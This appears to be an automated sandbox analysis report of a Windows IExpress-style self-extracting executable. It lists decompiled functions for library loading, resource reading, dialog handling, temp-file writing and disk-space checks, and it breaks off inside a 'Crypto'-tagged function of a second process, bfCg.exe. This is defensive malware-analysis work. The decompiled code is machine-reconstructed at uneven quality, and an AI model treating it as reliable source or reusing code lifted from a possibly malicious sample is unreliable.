				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xeb8004; // 0x92ae1240
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00EB1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E00EB658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00EB6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00eb6495
0x00eb6495
0x00eb64a0
0x00eb64a7
0x00eb64ab
0x00eb64bd
0x00eb64c2
0x00eb64d3
0x00eb64df
0x00eb64e8
0x00eb6502
0x00eb64ee
0x00eb64f9
0x00eb64f9
0x00eb6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB6502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB64AC
advpack.dll, xrefs: 00EB64C2, 00EB64CD, 00EB6501

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-1955609190
Opcode ID: 5c3966ae10a15ec1919a97dd928b400eb451435fe74b2ef0568ae01a4c7ba4a0
Instruction ID: 73777731a244e2f33774c26c0871fe5c593d174dc11f3723ec462a4d7938ab3a
Opcode Fuzzy Hash: 5c3966ae10a15ec1919a97dd928b400eb451435fe74b2ef0568ae01a4c7ba4a0
Instruction Fuzzy Hash: 5C01D670605108AFDB60EB65DC45AEB7778DB50310F5016A5F585B21C0DF749E89CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00EB4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00EB468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00EB468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00EB44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00eb417d
0x00eb418f
0x00eb4193
0x00eb41b7
0x00eb41d3
0x00eb41e6
0x00000000
0x00eb41e7
0x00eb41d5
0x00eb41d6
0x00eb41d8
0x00eb41d9
0x00eb41da
0x00eb41df
0x00eb41e1
0x00000000
0x00eb41e1
0x00eb41b9
0x00eb41ba
0x00eb41bc
0x00eb41bd
0x00eb41be
0x00000000
0x00eb41be
0x00000000

APIs

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00EB30B4), ref: 00EB4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00EB30B4), ref: 00EB41E7

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Strings

FINISHMSG, xrefs: 00EB4173, 00EB41AB
<None>, xrefs: 00EB41C5

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 2efb8c077d03bb72126b8e3a831e7bbc5d6287d4c7fd3cd017702915f459b1b5
Instruction ID: e4ba2669cc4541eb26eb6345f3794282f2639cb4c63a4ca72f7e867a2175deae
Opcode Fuzzy Hash: 2efb8c077d03bb72126b8e3a831e7bbc5d6287d4c7fd3cd017702915f459b1b5
Instruction Fuzzy Hash: 110121F17012243FF724262A8C96FFB22CEDBC0798F10103AB705F11C29A68CC0000B5

Uniqueness

Uniqueness Score: -1.00%

Function 00EB19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EB19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xeb8004; // 0x92ae1240
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00EB43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xeb9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00EB6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00eb19e0
0x00eb19e0
0x00eb19eb
0x00eb19f2
0x00eb19f9
0x00eb19fc
0x00eb1a01
0x00eb1a2a
0x00eb1a2e
0x00eb1a3e
0x00eb1a4f
0x00eb1a62
0x00eb1a6a
0x00000000
0x00eb1a03
0x00eb1a06
0x00eb1a20
0x00eb1a20
0x00eb1a08
0x00eb1a08
0x00eb1a14
0x00000000
0x00eb1a16
0x00eb1a18
0x00eb1a70
0x00eb1a72
0x00eb1a72
0x00eb1a14
0x00eb1a06
0x00eb1a81

APIs

EndDialog.USER32(?,?), ref: 00EB1A18
GetDesktopWindow.USER32 ref: 00EB1A24
LoadStringA.USER32(?,?,00000200), ref: 00EB1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00EB1A62
MessageBeep.USER32(000000FF), ref: 00EB1A6A

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 110781a78be00cc0ca76b2e072557bd938bafe2c15e715b16e672e158fd19e99
Instruction ID: 2b08116d8eacacffdcffac89b9da41739af6c670057947a18801cbfe3fedd853
Opcode Fuzzy Hash: 110781a78be00cc0ca76b2e072557bd938bafe2c15e715b16e672e158fd19e99
Instruction Fuzzy Hash: A4110871601109AFDB40EF68EE08AEF77B8EF09310F4042A0F512F3191DA30AE05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EB63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00EB63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xeb8004; // 0x92ae1240
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00EB1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
				E00EB658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xeb9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xeb9124 = 0x80070052;
					_t37 = 0;
				}
				return E00EB6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00eb63cb
0x00eb63d2
0x00eb63d8
0x00eb63ea
0x00eb63f3
0x00eb6401
0x00eb6402
0x00eb6410
0x00eb6415
0x00eb6433
0x00eb6438
0x00eb6449
0x00eb6463
0x00eb646d
0x00eb6477
0x00eb6477
0x00eb647a
0x00eb643a
0x00eb643a
0x00eb6444
0x00eb6444
0x00eb6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB63EB

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-388467436
Opcode ID: 0f353d0c0f27ad22df11c6e15e413a8473345e9d22d78bc2fd120044509b5422
Instruction ID: f72f838deec616cc3fffe4884a17ff22470d03c0f0d5159ed21bdb27fe36b850
Opcode Fuzzy Hash: 0f353d0c0f27ad22df11c6e15e413a8473345e9d22d78bc2fd120044509b5422
Instruction Fuzzy Hash: D021C371A01218AFDB21DF26DC85FEB77A8EB45314F0042A9A695B3280DAB45D888F64

Uniqueness

Uniqueness Score: -1.00%

Function 00EB47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00EB1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xeb91e0; // 0xd582b0
						 *(_t34 + 4) = _t11;
						 *0xeb91e0 = _t34;
						return 1;
					}
					_t25 =  *0xeb8584; // 0x0
					E00EB44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xeb8584; // 0x0
				E00EB44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00eb47e8
0x00eb47f0
0x00eb47f4
0x00eb480f
0x00eb4811
0x00eb4814
0x00eb4814
0x00eb4816
0x00eb4817
0x00eb4829
0x00eb482b
0x00eb482f
0x00eb484f
0x00eb4852
0x00eb4855
0x00eb4855
0x00eb4857
0x00eb4858
0x00eb4860
0x00eb4865
0x00eb486a
0x00eb486f
0x00000000
0x00eb4876
0x00eb4831
0x00eb4841
0x00eb4847
0x00eb480b
0x00000000
0x00eb480b
0x00eb47f6
0x00eb4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00EB4E6F), ref: 00EB47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00EB4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00EB4847

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB4851

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-388467436
Opcode ID: 0c145ad12750f6798c3a7f172a41b5155209f9f7ebe47b166e9ac6dfb1ac5749
Instruction ID: ed1c2a5638bd3c6b6100341774d39a13ca6dd006e15fe8861b020b395770cd31
Opcode Fuzzy Hash: 0c145ad12750f6798c3a7f172a41b5155209f9f7ebe47b166e9ac6dfb1ac5749
Instruction Fuzzy Hash: 60110AF56046416FD7199F34AC18FB7375AE785300F049619FA42F7382DA359C0A8660

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00eb368c
0x00eb368f
0x00eb3691
0x00eb369f
0x00eb36a7
0x00000000
0x00000000
0x00eb36ba
0x00000000
0x00eb36bc
0x00eb36bc
0x00eb36c0
0x00eb36cb
0x00eb36c2
0x00eb36c4
0x00eb36c4
0x00eb36da
0x00eb36e0
0x00eb36e6
0x00000000
0x00000000
0x00eb36e6
0x00000000
0x00eb36ba
0x00eb36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00EB369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36B2
DispatchMessageA.USER32(?), ref: 00EB36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36DA

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: affebaee3411c24f2c453fe3dadd4394a4dfadb812bba62dbbf944389b08b0e8
Instruction ID: add9a14f560fb49e4bc4e462204ae76552342e5d1314149507db36393a212277
Opcode Fuzzy Hash: affebaee3411c24f2c453fe3dadd4394a4dfadb812bba62dbbf944389b08b0e8
Instruction Fuzzy Hash: 0801A7729012147BDF308BBB5C49EEB777CEBC9B10F040229F905F2184D561C644C661

Uniqueness

Uniqueness Score: -1.00%

Function 00EB65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00EB65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00eb65e8
0x00eb65ed
0x00eb65ef
0x00eb65f2
0x00eb65f4
0x00eb65f4
0x00eb65f6
0x00eb65f7
0x00eb6608
0x00eb6611
0x00eb6618
0x00eb661c
0x00000000
0x00000000
0x00eb660e
0x00eb6623
0x00eb6625
0x00eb663b
0x00eb663b
0x00eb663d
0x00eb6641
0x00eb6610
0x00eb6610
0x00000000
0x00eb6610
0x00eb6644
0x00eb6647
0x00eb6647
0x00eb6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00EB2B33), ref: 00EB6602
CharPrevA.USER32(?,00000000), ref: 00EB6612
CharPrevA.USER32(?,00000000), ref: 00EB6629
CharNextA.USER32(00000000), ref: 00EB6635

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 83c5e4b59062f306c5de847014e7846abd4aa2a5b77d7c8e9f0434dd1f393a34
Instruction ID: 8401887d70c4299ba85d284e126ffe722ec7c269493d340e8a387760f18d2239
Opcode Fuzzy Hash: 83c5e4b59062f306c5de847014e7846abd4aa2a5b77d7c8e9f0434dd1f393a34
Instruction Fuzzy Hash: 96F028720061506EEB321B2D9CC89FBBF9CDF87358F2D02BFE4D1B2015D6190D0A8AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xeb81f8 = E00EB6C70();
				__set_app_type(E00EB6FBE(2));
				 *0xeb88a4 =  *0xeb88a4 | 0xffffffff;
				 *0xeb88a8 =  *0xeb88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xeb8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xeb851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00EB7000();
				if( *0xeb8000 == 0) {
					__setusermatherr(E00EB7000);
				}
				E00EB71EF(_t6);
				return 0;
			}

0x00eb69b7
0x00eb69c2
0x00eb69c8
0x00eb69cf
0x00eb69d8
0x00eb69de
0x00eb69e4
0x00eb69e6
0x00eb69ec
0x00eb69f2
0x00eb69f4
0x00eb6a00
0x00eb6a07
0x00eb6a0d
0x00eb6a0e
0x00eb6a15

APIs

Part of subcall function 00EB6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00EB6FC5

__set_app_type.MSVCRT ref: 00EB69C2
__p__fmode.MSVCRT ref: 00EB69D8
__p__commode.MSVCRT ref: 00EB69E6
__setusermatherr.MSVCRT ref: 00EB6A07

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: e343d44dca1d7b3f53219caa87079b2336f50ed2969e75b2357834b0f32a5e8a
Instruction ID: 21abc37e8c2c65fe68babd542e49c92229bc6bfca18b4ec61456efb15612d6ea
Opcode Fuzzy Hash: e343d44dca1d7b3f53219caa87079b2336f50ed2969e75b2357834b0f32a5e8a
Instruction Fuzzy Hash: 39F0F8701093068FDB68AF76AE1A6573BA6FB44321B141729E4A1B63F0CF3A8548CA11

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB6952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0xeb5760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x00eb695b
0x00eb6960
0x00eb6963
0x00eb6966
0x00eb6969
0x00eb696c
0x00eb6972
0x00eb6987
0x00eb699f
0x00eb699f
0x00eb6987
0x00eb69a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00EB5760,?,A:\), ref: 00EB697F
MulDiv.KERNEL32(?,?,00000400), ref: 00EB6999

Strings

`W, xrefs: 00EB6972, 00EB6975

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W
API String ID: 1705453755-2113494416
Opcode ID: 74b3e2bfb837ca116b3cc74edd277347ceb7d6901c5626818198a5c56f633d23
Instruction ID: 451bead45182a14693718418a7f9119ebccec4703d4963d9b5b5209f8103a4e2
Opcode Fuzzy Hash: 74b3e2bfb837ca116b3cc74edd277347ceb7d6901c5626818198a5c56f633d23
Instruction Fuzzy Hash: 3CF097B6D1122CBBDB11DFE98944ADFBBBCEB48700F144296E510F6240D6759A058BD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bfCg.exePID: 2564, Parent PID: 1216COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	965
Total number of Limit Nodes:	41

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00943BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00943BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x948004; // 0xec518a5e
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x949124 =  *0x949124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x948a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
